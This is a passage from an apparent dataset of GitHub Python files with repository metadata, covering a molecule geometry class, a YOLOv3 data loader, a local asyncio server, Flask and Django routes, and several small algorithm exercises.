\"))\ncols = int(input(\"Enter the number of columns: \"))\n\nlst = []\nfor i in range(rows):\n row = input(\"Enter the values for row {}: \".format(i+1))\n lst.append([int(x) for x in row.split()])\n\nlst_sorted = sort_rows(lst)\nprint_list(lst_sorted)\n","repo_name":"Vaish-cse/python","sub_path":"rows.py","file_name":"rows.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74235970651","text":"import numpy as np\nfrom qgrep.atom import atomic_masses, atomic_numbers\n\nfrom cclib.io import ccread\n\n\nclass Molecule:\n def __init__(self, geom=None):\n \"\"\" Simple molecule class\n\n :param geom: List of lists ordered as [[atom, [x, y, z]], ...]\n \"\"\"\n # Magically unpacks\n self.geom = geom\n\n def __len__(self):\n \"\"\"Return the number of atoms in the molecule\"\"\"\n return len(self.atoms)\n\n def __str__(self):\n \"\"\"\n Returns a string of the geometry, filling out positions with zeros and\n spaces as needed\n \"\"\"\n form = '{:<4}' + ' {:> 13.8f}' * 3\n return '\\n'.join([form.format(atom, *xyz) for 
atom, xyz in self])\n\n    def __iter__(self):\n        for atom, xyz in zip(self.atoms, self.xyz):\n            yield atom, xyz\n\n    def __add__(self, other):\n        \"\"\" Combine two molecules \"\"\"\n        if isinstance(self, Molecule) and isinstance(other, Molecule):\n            return Molecule(self.geom + other.geom)\n        else:\n            raise ValueError(f'Cannot combine {type(self)} and {type(other)}')\n\n    def __getitem__(self, i):\n        \"\"\"Returns the ith atom\"\"\"\n        return (self.atoms[i], self.xyz[i])\n\n    def __setitem__(self, i, atom_xyz):\n        \"\"\"Sets the ith atom\"\"\"\n        atom, xyz = atom_xyz\n        Molecule.check_atom(atom, xyz)\n        self.atoms[i] = atom\n        self.xyz[i] = xyz\n\n    def __delitem__(self, i):\n        \"\"\"Deletes the ith atom\"\"\"\n        del self.atoms[i]\n        self.xyz = np.delete(self.xyz, i, axis=0)\n\n    def __eq__(self, other):\n        if not isinstance(other, Molecule):\n            return False\n        if self.atoms != other.atoms or (self.xyz != other.xyz).any():\n            return False\n        return True\n\n    def insert(self, i, atom, xyz):\n        \"\"\"Insert the atom in the specified position\"\"\"\n        Molecule.check_atom(atom, xyz)\n        self.atoms.insert(i, atom)\n        self.xyz = np.insert(self.xyz, i, xyz, axis=0)\n\n    @property\n    def geom(self):\n        \"\"\"Return the geometry\"\"\"\n        return [[atom, list(xyz)] for atom, xyz in self]\n\n    @geom.setter\n    def geom(self, geom):\n        \"\"\"Set the geometry\"\"\"\n        self.atoms, self.xyz = [], np.array([])\n        if geom is not None:\n            Molecule.check_geom(geom)\n            atoms, xyzs = zip(*geom)\n            self.atoms = list(atoms)\n            self.xyz = np.array(xyzs)\n\n    def append(self, atom, xyz):\n        \"\"\"Append atom to geometry\"\"\"\n        Molecule.check_atom(atom, xyz)\n        self.atoms.append(atom)\n        if len(self.xyz) > 0:\n            self.xyz = np.append(self.xyz, np.array(xyz)[np.newaxis, ...], axis=0)\n        else:\n            self.xyz = np.array(xyz)[np.newaxis, ...]\n\n    @staticmethod\n    def check_atom(atom, xyz):\n        \"\"\" Check if an atom is properly formatted\n        Raises a syntax error if it is not\n        \"\"\"\n        if not isinstance(atom, str):\n            raise SyntaxError(f'Atom name must be a string: {atom}')\n        if len(xyz) != 3:\n            raise SyntaxError('Only 3 coordinates supported.')\n        return True\n\n    @staticmethod\n    def check_geom(geom):\n        \"\"\" Checks if the given geometry is valid\n        raises a syntax error if it is not\n        \"\"\"\n        for atom, xyz in geom:\n            Molecule.check_atom(atom, xyz)\n\n        return True\n\n    @staticmethod\n    def read_from(infile):\n        \"\"\"Read from a file\"\"\"\n        try:\n            data = ccread(infile)\n            # Hack: cclib doesn't have an easy way to access atom names\n            lines = data.writexyz().splitlines()\n        except AttributeError as e:\n            # Attempt to read as an XYZ file\n            with open(infile) as f:\n                lines = f.readlines()\n            # Strip off length if provided\n            if lines[0].strip().isdigit():\n                lines = lines[2:]\n        geom = []\n        for line in lines:\n            if line.strip() == '':\n                continue\n            atom, x, y, z = line.split()[:4]\n            geom.append([atom, [float(x), float(y), float(z)]])\n\n        return Molecule(geom)\n\n    def write(self, outfile='geom.xyz', label=True, style='xyz'):\n        \"\"\"\n        Writes the geometry to the specified file\n        Prints the size at the beginning if desired (to conform to XYZ format)\n        \"\"\"\n        out = ''\n        if style == 'xyz':\n            if label:\n                out += f'{len(self)}\\n\\n'\n            out += f'{self}'\n        elif style == 'latex':\n            header = f'{len(self)}\\\\\\\\\\n'\n            line_form = '{:<2}' + ' {:> 13.6f}' * 3\n            atoms = [line_form.format(atom, *xyz) for atom, xyz in self]\n            atoms = '\\n'.join(atoms)\n            out = '\\\\begin{verbatim}\\n' + atoms + '\\n\\\\end{verbatim}'\n        else:\n            raise SyntaxError('Invalid style')\n        with open(outfile, 'w') as f:\n            f.write(out)\n\n    
def center_of_mass(self, masses=None):\n        \"\"\"\n        Finds the center of mass\n        :param masses: a dictionary or list of masses to use\n        \"\"\"\n        if isinstance(masses, list):\n            masses_list = masses\n        elif isinstance(masses, dict):\n            masses_list = [masses[atomic_numbers[atom]] for atom in self.atoms]\n        elif masses is None:\n            masses_list = [atomic_masses[atomic_numbers[atom]] for atom in self.atoms]\n        else:\n            raise ValueError(f'Expected a list or dictionary of masses, got: {type(masses)}')\n\n        com = np.zeros(3)\n        total_mass = 0\n        for mass, xyz in zip(masses_list, self.xyz):\n            com += mass*np.array(xyz)\n            total_mass += mass\n\n        return com/total_mass\n\n    def moment_of_inertia_tensor(self, masses=None):\n        \"\"\"\n        Generates the moment of inertia tensor (3x3).\n        :param masses: a dictionary or list of masses to use\n        \"\"\"\n        if isinstance(masses, list):\n            masses_list = masses\n        elif isinstance(masses, dict):\n            masses_list = [masses[atomic_numbers[atom]] for atom in self.atoms]\n        elif masses is None:\n            masses_list = [atomic_masses[atomic_numbers[atom]] for atom in self.atoms]\n        else:\n            raise ValueError(f'Expected a list or dictionary of masses, got: {type(masses)}')\n\n        com = self.center_of_mass(masses)\n\n        moi_tensor = np.zeros((3, 3))\n        for mass, xyz in zip(masses_list, self.xyz):\n            x, y, z = xyz - com\n            moi_tensor += mass * np.array([[y**2 + z**2, -x*y, -x*z],\n                                           [ -y*x, x**2 + z**2, -y*z],\n                                           [ -z*x, -z*y, x**2 + y**2]])\n        return moi_tensor\n\n    def reorder(self, order):\n        \"\"\"\n        :param order: new order for the molecule\n        :return: molecule with atoms reordered\n        \"\"\"\n        geom = ['']*len(self)\n        for atom, i in zip(self, order):\n            geom[i] = atom\n\n        assert not any((atom == '' for atom in geom))\n\n        return Molecule(geom)\n\n","repo_name":"jevandezande/qgrep","sub_path":"qgrep/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23456563971","text":"import asyncio\nfrom asyncio import transports\nfrom typing import Optional\n\n\nclass ClientProtocol(asyncio.Protocol):\n    login: str\n    server: 'Server'\n    transport: transports.Transport\n\n    def __init__(self, server: 'Server'):\n        self.server = server\n\n    def data_received(self, data: bytes):\n        print(data)\n\n    def connection_made(self, transport: transports.Transport):\n        self.transport = transport\n        self.server.clients.append(self)\n        print('connection established')\n\n    def connection_lost(self, exception):\n        self.server.clients.remove(self)\n        print('connection lost')\n\n\nclass Server:\n    clients: list\n\n    def __init__(self):\n        self.clients = []\n\n    def create_protocol(self):\n        return ClientProtocol(self)\n\n    async def start(self):\n        loop = asyncio.get_running_loop()\n        coroutine = await loop.create_server(\n            self.create_protocol,\n            '127.0.0.1',\n            8888\n        )\n        print('server was started ...')\n\n        await coroutine.serve_forever()\n\n\nprocess = Server()\nasyncio.run(process.start())\n","repo_name":"avkulistov/python","sub_path":"messanger/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70291398492","text":"import math\n\nif __name__ == \"__main__\":\n    n, m = map(int, input().split())\n\n    tree = list(map(int, input().split()))\n    tree.append(0)\n    tree.sort(reverse=True)\n    t_sum = 0\n    t_count = 1\n    re = 0\n    for i in range(n):\n        if t_sum + t_count * (tree[i] - 
tree[i + 1]) >= m:\n re += math.ceil((m - t_sum) / t_count)\n t_sum += math.ceil((m - t_sum) / t_count) * t_count\n break\n else:\n re += (tree[i] - tree[i + 1])\n t_sum += t_count * (tree[i] - tree[i + 1])\n t_count += 1\n\n print(tree[0] - re)\n","repo_name":"YDbata/Algorithm","sub_path":"baekjoon/2805/2805_나무자르기.py","file_name":"2805_나무자르기.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18345507483","text":"import os\nimport cv2\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport core.utils as utils\nfrom core.config import cfg\n\n\n\nclass Dataset(object):\n \"\"\"implement Dataset here\"\"\"\n def __init__(self, dataset_type):\n self.annot_path = cfg.TRAIN.ANNOT_PATH if dataset_type == 'train' else cfg.TEST.ANNOT_PATH\n self.input_sizes = cfg.TRAIN.INPUT_SIZE if dataset_type == 'train' else cfg.TEST.INPUT_SIZE\n self.batch_size = cfg.TRAIN.BATCH_SIZE if dataset_type == 'train' else cfg.TEST.BATCH_SIZE\n self.data_aug = cfg.TRAIN.DATA_AUG if dataset_type == 'train' else cfg.TEST.DATA_AUG\n\n self.train_input_sizes = cfg.TRAIN.INPUT_SIZE\n self.strides = np.array(cfg.YOLO.STRIDES)\n self.classes = utils.read_class_names(cfg.YOLO.CLASSES)\n self.num_classes = len(self.classes)\n self.anchors = np.array(utils.get_anchors(cfg.YOLO.ANCHORS))\n self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE\n self.max_bbox_per_scale = 150\n\n self.annotations = self.load_annotations(dataset_type)\n self.num_samples = len(self.annotations)\n self.num_batchs = int(np.ceil(self.num_samples / self.batch_size))\n self.batch_count = 0\n\n\n def load_annotations(self, dataset_type):\n with open(self.annot_path, 'r') as f:\n txt = f.readlines()\n annotations = [line.strip() for line in txt if len(line.strip().split()[1:]) != 0]\n np.random.shuffle(annotations)\n return annotations\n\n def __iter__(self):\n return self\n\n def __next__(self):\n\n with tf.device('/cpu:0'):\n self.train_input_size = random.choice(self.train_input_sizes)\n self.train_output_sizes = self.train_input_size // self.strides\n\n batch_image = np.zeros((self.batch_size, self.train_input_size, self.train_input_size, 3))\n\n batch_label_sbbox = np.zeros((self.batch_size, self.train_output_sizes[0], self.train_output_sizes[0],\n self.anchor_per_scale, 5 + self.num_classes))\n batch_label_mbbox = np.zeros((self.batch_size, self.train_output_sizes[1], self.train_output_sizes[1],\n self.anchor_per_scale, 5 + self.num_classes))\n batch_label_lbbox = np.zeros((self.batch_size, self.train_output_sizes[2], self.train_output_sizes[2],\n self.anchor_per_scale, 5 + self.num_classes))\n\n batch_sbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n batch_mbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n batch_lbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n\n num = 0\n if self.batch_count < self.num_batchs:\n while num < self.batch_size:\n index = self.batch_count * self.batch_size + num\n if index >= self.num_samples: index -= self.num_samples\n annotation = self.annotations[index]\n image, bboxes = self.parse_annotation(annotation)\n label_sbbox, label_mbbox, label_lbbox, sbboxes, mbboxes, lbboxes = self.preprocess_true_boxes(bboxes)\n\n batch_image[num, :, :, :] = image\n batch_label_sbbox[num, :, :, :, :] = label_sbbox\n batch_label_mbbox[num, :, :, :, :] = label_mbbox\n batch_label_lbbox[num, :, :, :, :] = label_lbbox\n batch_sbboxes[num, :, :] = sbboxes\n batch_mbboxes[num, :, 
:] = mbboxes\n batch_lbboxes[num, :, :] = lbboxes\n num += 1\n self.batch_count += 1\n return batch_image, batch_label_sbbox, batch_label_mbbox, batch_label_lbbox, \\\n batch_sbboxes, batch_mbboxes, batch_lbboxes\n else:\n self.batch_count = 0\n np.random.shuffle(self.annotations)\n raise StopIteration\n\n def random_horizontal_flip(self, image, bboxes):\n\n if random.random() < 0.5:\n _, w, _ = image.shape\n image = image[:, ::-1, :]\n bboxes[:, [0,2]] = w - bboxes[:, [2,0]]\n\n return image, bboxes\n\n def random_crop(self, image, bboxes):\n\n if random.random() < 0.5:\n h, w, _ = image.shape\n max_bbox = np.concatenate([np.min(bboxes[:, 0:2], axis=0), np.max(bboxes[:, 2:4], axis=0)], axis=-1)\n\n max_l_trans = max_bbox[0]\n max_u_trans = max_bbox[1]\n max_r_trans = w - max_bbox[2]\n max_d_trans = h - max_bbox[3]\n\n crop_xmin = max(0, int(max_bbox[0] - random.uniform(0, max_l_trans)))\n crop_ymin = max(0, int(max_bbox[1] - random.uniform(0, max_u_trans)))\n crop_xmax = max(w, int(max_bbox[2] + random.uniform(0, max_r_trans)))\n crop_ymax = max(h, int(max_bbox[3] + random.uniform(0, max_d_trans)))\n\n image = image[crop_ymin : crop_ymax, crop_xmin : crop_xmax]\n\n bboxes[:, [0, 2]] = bboxes[:, [0, 2]] - crop_xmin\n bboxes[:, [1, 3]] = bboxes[:, [1, 3]] - crop_ymin\n\n return image, bboxes\n\n def random_translate(self, image, bboxes):\n\n if random.random() < 0.5:\n h, w, _ = image.shape\n max_bbox = np.concatenate([np.min(bboxes[:, 0:2], axis=0), np.max(bboxes[:, 2:4], axis=0)], axis=-1)\n\n max_l_trans = max_bbox[0]\n max_u_trans = max_bbox[1]\n max_r_trans = w - max_bbox[2]\n max_d_trans = h - max_bbox[3]\n\n tx = random.uniform(-(max_l_trans - 1), (max_r_trans - 1))\n ty = random.uniform(-(max_u_trans - 1), (max_d_trans - 1))\n\n M = np.array([[1, 0, tx], [0, 1, ty]])\n image = cv2.warpAffine(image, M, (w, h))\n\n bboxes[:, [0, 2]] = bboxes[:, [0, 2]] + tx\n bboxes[:, [1, 3]] = bboxes[:, [1, 3]] + ty\n\n return image, bboxes\n\n def parse_annotation(self, annotation):\n\n line = annotation.split()\n image_path = line[0]\n if not os.path.exists(image_path):\n raise KeyError(\"%s does not exist ... 
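# Quick check of the flip arithmetic used in random_horizontal_flip above:
# mirroring x-coordinates maps [x1, x2] -> [w - x2, w - x1], which is exactly
# what bboxes[:, [0, 2]] = w - bboxes[:, [2, 0]] computes. Illustrative numbers:
import numpy as np

w = 100
boxes = np.array([[10, 20, 30, 40]])       # x1, y1, x2, y2
boxes[:, [0, 2]] = w - boxes[:, [2, 0]]
print(boxes)                               # [[70 20 90 40]] -- still x1 < x2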
\" %image_path)\n image = np.array(cv2.imread(image_path))\n bboxes = np.array([list(map(lambda x: int(float(x)), box.split(','))) for box in line[1:]])\n\n if self.data_aug:\n image, bboxes = self.random_horizontal_flip(np.copy(image), np.copy(bboxes))\n image, bboxes = self.random_crop(np.copy(image), np.copy(bboxes))\n image, bboxes = self.random_translate(np.copy(image), np.copy(bboxes))\n\n image, bboxes = utils.image_preporcess(np.copy(image), [self.train_input_size, self.train_input_size], np.copy(bboxes))\n \n updated_bb = []\n for bb in bboxes:\n x1, y1, x2, y2, cls_label = bb\n \n if x2 <= x1 or y2 <= y1:\n # dont use such boxes as this may cause nan loss.\n continue\n\n x1 = int(np.clip(x1, 0, image.shape[1]))\n y1 = int(np.clip(y1, 0, image.shape[0]))\n x2 = int(np.clip(x2, 0, image.shape[1]))\n y2 = int(np.clip(y2, 0, image.shape[0]))\n # clipping coordinates between 0 to image dimensions as negative values \n # or values greater than image dimensions may cause nan loss.\n updated_bb.append([x1, y1, x2, y2, cls_label])\n\n return image, np.array(updated_bb)\n\n def bbox_iou(self, boxes1, boxes2):\n\n boxes1 = np.array(boxes1)\n boxes2 = np.array(boxes2)\n\n boxes1_area = boxes1[..., 2] * boxes1[..., 3]\n boxes2_area = boxes2[..., 2] * boxes2[..., 3]\n\n boxes1 = np.concatenate([boxes1[..., :2] - boxes1[..., 2:] * 0.5,\n boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)\n boxes2 = np.concatenate([boxes2[..., :2] - boxes2[..., 2:] * 0.5,\n boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)\n\n left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])\n right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])\n\n inter_section = np.maximum(right_down - left_up, 0.0)\n inter_area = inter_section[..., 0] * inter_section[..., 1]\n union_area = boxes1_area + boxes2_area - inter_area\n\n return inter_area / (union_area + 1e-6)\n # added 1e-6 in denominator to avoid generation of inf, which may cause nan loss\n\n\n def preprocess_true_boxes(self, bboxes):\n\n label = [np.zeros((self.train_output_sizes[i], self.train_output_sizes[i], self.anchor_per_scale,\n 5 + self.num_classes)) for i in range(3)]\n bboxes_xywh = [np.zeros((self.max_bbox_per_scale, 4)) for _ in range(3)]\n bbox_count = np.zeros((3,))\n\n for bbox in bboxes:\n bbox_coor = bbox[:4]\n bbox_class_ind = bbox[4]\n\n onehot = np.zeros(self.num_classes, dtype=np.float)\n onehot[bbox_class_ind] = 1.0\n uniform_distribution = np.full(self.num_classes, 1.0 / self.num_classes)\n deta = 0.01\n smooth_onehot = onehot * (1 - deta) + deta * uniform_distribution\n\n bbox_xywh = np.concatenate([(bbox_coor[2:] + bbox_coor[:2]) * 0.5, bbox_coor[2:] - bbox_coor[:2]], axis=-1)\n bbox_xywh_scaled = 1.0 * bbox_xywh[np.newaxis, :] / self.strides[:, np.newaxis]\n\n iou = []\n exist_positive = False\n for i in range(3):\n anchors_xywh = np.zeros((self.anchor_per_scale, 4))\n anchors_xywh[:, 0:2] = np.floor(bbox_xywh_scaled[i, 0:2]).astype(np.int32) + 0.5\n anchors_xywh[:, 2:4] = self.anchors[i]\n\n iou_scale = self.bbox_iou(bbox_xywh_scaled[i][np.newaxis, :], anchors_xywh)\n iou.append(iou_scale)\n iou_mask = iou_scale > 0.3\n\n if np.any(iou_mask):\n xind, yind = np.floor(bbox_xywh_scaled[i, 0:2]).astype(np.int32)\n xind = np.clip(xind, 0, self.train_output_sizes[i] - 1) \n yind = np.clip(yind, 0, self.train_output_sizes[i] - 1) \n # This will mitigate errors generated when the location computed by this is more the grid cell location. \n # e.g. For 52x52 grid cells possible values of xind and yind are in range [0-51] including both. 
\n # But sometimes the coomputation makes it 52 and then it will try to find that location in label array \n # which is not present and throws error during training.\n\n label[i][yind, xind, iou_mask, :] = 0\n label[i][yind, xind, iou_mask, 0:4] = bbox_xywh\n label[i][yind, xind, iou_mask, 4:5] = 1.0\n label[i][yind, xind, iou_mask, 5:] = smooth_onehot\n\n bbox_ind = int(bbox_count[i] % self.max_bbox_per_scale)\n bboxes_xywh[i][bbox_ind, :4] = bbox_xywh\n bbox_count[i] += 1\n\n exist_positive = True\n\n if not exist_positive:\n best_anchor_ind = np.argmax(np.array(iou).reshape(-1), axis=-1)\n best_detect = int(best_anchor_ind / self.anchor_per_scale)\n best_anchor = int(best_anchor_ind % self.anchor_per_scale)\n xind, yind = np.floor(bbox_xywh_scaled[best_detect, 0:2]).astype(np.int32)\n xind = np.clip(xind, 0, self.train_output_sizes[i] - 1) \n yind = np.clip(yind, 0, self.train_output_sizes[i] - 1) \n # This will mitigate errors generated when the location computed by this is more the grid cell location. \n # e.g. For 52x52 grid cells possible values of xind and yind are in range [0-51] including both. \n # But sometimes the coomputation makes it 52 and then it will try to find that location in label array \n # which is not present and throws error during training.\n\n label[best_detect][yind, xind, best_anchor, :] = 0\n label[best_detect][yind, xind, best_anchor, 0:4] = bbox_xywh\n label[best_detect][yind, xind, best_anchor, 4:5] = 1.0\n label[best_detect][yind, xind, best_anchor, 5:] = smooth_onehot\n\n bbox_ind = int(bbox_count[best_detect] % self.max_bbox_per_scale)\n bboxes_xywh[best_detect][bbox_ind, :4] = bbox_xywh\n bbox_count[best_detect] += 1\n label_sbbox, label_mbbox, label_lbbox = label\n sbboxes, mbboxes, lbboxes = bboxes_xywh\n return label_sbbox, label_mbbox, label_lbbox, sbboxes, mbboxes, lbboxes\n\n def __len__(self):\n return self.num_batchs\n\n\n\n\n","repo_name":"YunYang1994/tensorflow-yolov3","sub_path":"core/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","stars":3631,"dataset":"github-code","pt":"32"} +{"seq_id":"42904623659","text":"# -*- coding:utf-8 -8-\r\n\r\n# 设置标志位\r\ndef breakplay():\r\n while True:\r\n break_flag = raw_input('是否继续?(y/n)')\r\n if break_flag == 'y' or break_flag == 'n':\r\n return break_flag\r\n else:\r\n print(\"输入错误,请重新输入\")\r\n \r\ninfo_file = open('information.txt', 'r') # 只读文件的形式打开文件\r\n# 读入员工信息, 生成一个列表\r\nemployee_info = info_file.readlines()\r\ninfo_file.close()\r\n\r\nbreak_flag = ''\r\nprint(\"欢迎来到员工信息查询系统\")\r\n\r\nwhile break_flag != 'n':\r\n while True:\r\n search_info = raw_input(\"请输入您需要查询的信息...\")\r\n if len(search_info) > 2: # 判断输入字符的长度, 少于三个字符,需要重新输入\r\n break\r\n else:\r\n print(\"输入不合法,重新输入\")\r\n \r\n count_number = 0\r\n search_info_list = []\r\n for i in employee_info:\r\n if i.count(search_info) > 0:\r\n search_info_list.append(i.replace(search_info, '\\033[42;31;1m%s\\033[0m' % search_info))\r\n count_number += i.count(search_info)\r\n \r\n if count_number > 0:\r\n print(\"一共查询到: \\033[31; 1m %s \\033[0m 条信息 !\" % count_number)\r\n for i in search_info_list:\r\n print(i)\r\n break_flag = breakplay()\r\n else:\r\n print(\"没有查询到您需要的信息\")\r\n break_flag = breakplay()\r\n \r\n for i in range(2):\r\n print(\"感谢使用查询系统 %s 秒后, 系统退出\" % (3-i))\r\n 
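# The smooth_onehot line above is standard label smoothing: with delta = 0.01
# and C classes, the true class gets 0.99 + 0.01/C and every other class gets
# 0.01/C, so the target still sums to 1. Tiny numeric check (C = 4):
import numpy as np

num_classes, delta = 4, 0.01
onehot = np.zeros(num_classes)
onehot[1] = 1.0
smooth = onehot * (1 - delta) + delta * np.full(num_classes, 1.0 / num_classes)
print(smooth)          # [0.0025 0.9925 0.0025 0.0025]
print(smooth.sum())    # 1.0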
exit()","repo_name":"quadrant26/oldboy_py","sub_path":"day2/find_light.py","file_name":"find_light.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32332786645","text":"from flask import Blueprint,render_template,redirect,url_for\r\nfrom flask_login import login_required,current_user\r\n\r\nviews =Blueprint('views',__name__)\r\n\r\n@views.route('/')\r\ndef home():\r\n if current_user.is_authenticated:\r\n return render_template(\"base.html\")\r\n else:\r\n return redirect(url_for('auth.login'))\r\n\r\n\r\n@views.route('/admin')\r\ndef admin():\r\n return \"admin page\"","repo_name":"G-KrishnaAdithya/AIAS","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"41487152363","text":"def sum_all(arr):\n try:\n total = 0\n for i in range (min(arr), max(arr) + 1):\n total += i\n print(total)\n return total\n except Exception as ex:\n print(ex)\n\nsum_all([4, 1])\n","repo_name":"lraulin/algorithms","sub_path":"py/sum_range.py","file_name":"sum_range.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"11574182991","text":"from argparse import ArgumentParser\nimport numpy as np\nimport torch\nfrom preprocessor import process_image\nfrom model import load_model_from_path\nfrom utils import predict, get_flower_name\n\nparser = ArgumentParser()\nparser.add_argument('image_path')\nparser.add_argument('checkpoint')\nparser.add_argument('--top_k', required=False, default=1, type=int)\nparser.add_argument('--category_names', required=False, default='cat_to_name.json', type=str)\nparser.add_argument('--gpu', required=False, default=True, action=\"store_true\")\n\ndef main():\n args = parser.parse_args()\n device = 'cuda' if args.gpu else 'cpu'\n\n image = process_image(args.image_path)\n image = torch.unsqueeze(image, 0).type(torch.FloatTensor).to(device)\n \n model = load_model_from_path(args.checkpoint, device)\n \n top_p, top_c = predict(image, model, args.top_k)\n \n name = get_flower_name(args.category_names, top_c)\n \n print(f'name: {name}')\n print(f'prob: {[itm for itm in top_p.tolist()[0]]}')\n\n return name, top_p\n \n \n \n \nif __name__=='__main__':\n main()","repo_name":"yeaung276/FlowNN","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10844644234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 2 18:15:46 2021\n\n@author: Angad\n\"\"\"\n\nimport pandas\nfrom keras.utils import to_categorical\nfrom matplotlib import pyplot\n\ntrain_data = pandas.read_csv('./data/train.csv')\ntrain_y = to_categorical(train_data[\"label\"])\ntrain_x = train_data.loc[:, train_data.columns != \"label\"]\ntrain_x /= 256\ntrain_x = train_x.values.reshape(-1, 28, 28, 1)\n\nn_samples = 25\nfor i in range(n_samples):\n\t# define subplot\n\tpyplot.subplot(5, 5, 1 + i)\n\t# turn off axis labels\n\tpyplot.axis('off')\n\t# plot single image\n\tpyplot.imshow(train_x[i], cmap='gray_r')","repo_name":"angadp/DeepLearning","sub_path":"MNIST/Viz.py","file_name":"Viz.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"29221013473","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nR,C = map(int,input().split())\r\ngraph = [input().strip() for _ in range(R)]\r\ncheck = [0]*91 # ord 메소드를 이용하기 위한 배열 생성\r\n\r\ndef DFS(x,y,cnt):\r\n global max_cnt\r\n \r\n if cnt > max_cnt: # 값 갱신\r\n max_cnt = cnt\r\n \r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if 0 <= nx < R and 0 <= ny < C:\r\n if not check[ord(graph[nx][ny])]: # 아직 지나지 않은 알파벳인 경우\r\n check[ord(graph[nx][ny])] = 1 # 지난 알파벳으로 추가\r\n DFS(nx,ny,cnt + 1)\r\n check[ord(graph[nx][ny])] = 0 # 해당 위치에서의 탐색이 종료되었으므로, 다시 지나지 않은 알파벳으로 변경\r\n\r\ndx = [1,-1,0,0] \r\ndy = [0,0,-1,1]\r\ncheck[ord(graph[0][0])] = 1 # 첫 알파벳\r\nmax_cnt = 0\r\nDFS(0,0,1)\r\nprint(max_cnt)","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Gold/1987. 알파벳/알파벳.py","file_name":"알파벳.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6810860112","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static \nfrom recipes_app import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"homepage\"), \n path(\"add_recipe/\", views.recipesadd), \n path(\"add_author/\", views.authoradd),\n path(\"recipe//\", views.recipe_view),\n path(\"bio//\", views.author_view),\n path(\"image/\", views.imageadd),\n path(\"success/\", views.success, name=\"success\")\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, \n document_root=settings.MEDIA_ROOT)","repo_name":"mprodhan/RecipeBox-Project","sub_path":"recipes_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44096691779","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport shlex\nimport re\n\n\ndef ensure_quoted(s):\n \"\"\"\n Returns a quoted version of string 's' if that's not already the case\n \"\"\"\n rx = r\"^\\\"(.+)\\\"$\"\n\n if re.match(rx, s) is not None:\n return s\n else:\n return \"\\\"{}\\\"\".format(s)\n\n\nclass Description(object):\n \"\"\"\n A class to parse description information of Schematic Files Format of the KiCad\n TODO: Need to be done, currently just stores the raw data read from file\n \"\"\"\n def __init__(self, data):\n self.raw_data = data\n\n\nclass Component(object):\n \"\"\"\n A class to parse components of Schematic Files Format of the KiCad\n \"\"\"\n _L_KEYS = ['name', 'ref']\n _U_KEYS = ['unit', 'convert', 'time_stamp']\n _P_KEYS = ['posx', 'posy']\n _AR_KEYS = ['path', 'ref', 'part']\n _F_KEYS = ['id', 'ref', 'orient', 'posx', 'posy', 'size', 'attributs',\n 'hjust', 'props', 'name']\n\n _KEYS = {'L': _L_KEYS, 'U': _U_KEYS, 'P': _P_KEYS,\n 'AR': _AR_KEYS, 'F': _F_KEYS}\n\n def __init__(self, data):\n self.labels = {}\n self.unit = {}\n self.position = {}\n self.references = []\n self.fields = []\n self.old_stuff = []\n\n for line in data:\n if line[0] == '\\t':\n self.old_stuff.append(line)\n continue\n\n line = line.replace('\\n', '')\n s = shlex.shlex(line)\n s.whitespace_split = True\n s.commenters = ''\n s.quotes = '\"'\n line = list(s)\n\n # select the keys list and default values array\n if line[0] in self._KEYS:\n key_list = self._KEYS[line[0]]\n values = line[1:] + ['']*(len(key_list) - len(line[1:]))\n\n if line[0] == 'L':\n self.labels = dict(zip(key_list, values))\n elif line[0] == 'U':\n self.unit = dict(zip(key_list, values))\n 
